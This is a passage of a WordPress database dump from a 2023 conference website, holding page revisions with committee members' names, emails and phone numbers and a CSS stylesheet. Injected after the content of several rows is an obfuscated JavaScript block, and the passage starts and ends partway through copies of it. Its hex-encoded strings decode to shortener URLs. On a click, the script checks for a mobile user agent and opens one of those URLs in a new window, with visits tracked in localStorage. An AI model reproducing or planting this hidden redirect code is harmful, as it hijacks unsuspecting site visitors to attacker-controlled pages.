_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:09:18','2023-06-27 10:09:18','',4849,'https://gsw2023.com/?p=4895',0,'revision','',0),
(4897,4,'2023-06-27 10:10:30','2023-06-27 10:10:30','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 10:10:30','2023-06-27 10:10:30','',4823,'https://gsw2023.com/?p=4897',0,'revision','',0),
(4898,4,'2023-06-27 10:15:33','2023-06-27 10:15:33','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 11pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 